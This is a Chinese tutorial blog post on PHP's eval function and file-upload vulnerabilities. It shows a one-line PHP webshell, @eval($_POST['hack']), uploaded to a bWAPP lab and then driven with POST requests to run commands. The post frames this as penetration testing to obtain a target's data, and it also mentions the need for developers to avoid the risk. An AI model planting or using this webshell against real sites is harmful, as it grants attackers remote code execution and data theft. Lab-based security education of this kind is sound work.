前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHP函数eval:一句话木马

PHP函数eval:一句话木马

作者头像
如梦初醒_-
发布2022-10-26 15:51:21
1.1K0
发布2022-10-26 15:51:21
举报
文章被收录于专栏:最后一声蝉鸣

前景

1.在一个系统文件上传逻辑处理不严谨时

2.php危险函数未禁用

我是谁

含义: eval — 把字符串作为PHP代码执行

警告 函数eval()语言结构是 非常危险的,因为它允许执行任意 PHP 代码。它这样用是很危险的。如果您仔细的确认过,除了使用此结构以外 别无方法,请多加注意, 不要允许传入任何由用户 提供的、未经完整验证过的数据

文件上传漏洞

首先这里我用docker搭建了一个简单的bWAPP 实验环境

文件上传漏洞是什么?

关键词:绕过 文件上传(File Upload)是大部分应用都具备的功能, 例如用户上传附件、改头像、分享图片等 文件上传漏洞是开发者没有做充足验证(包括前端、后端)的情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者webshell等

这里我编写了一个php文件并上传到了这个实验环境

代码语言:javascript
复制
<?php
@eval($_POST['hack']);
?>
l0mb9kum.png
l0mb9kum.png

这里通过点击我们轻松访问到了上传的文件,并发现后端并没有去检测处理这个文件

l0mb9uiy.png
l0mb9uiy.png

这个时候我们就可以通过curl去访问这个文件,由于之前写入的是POST请求,所以我们这里入参也是通过POST的形式

l0mba202.png
l0mba202.png

get_current_user() 函数

返回当前 PHP 脚本所有者名称。

getcwd() 函数

取得当前工作目录

所以,在渗透过程中,如果系统逻辑性不是很严谨,我们可以通过这种方式来进行网络渗透,获取对方数据信息。当然,在我们的日常开发中,也是需要规避此类风险的。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前景
  • 我是谁
  • 文件上传漏洞
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档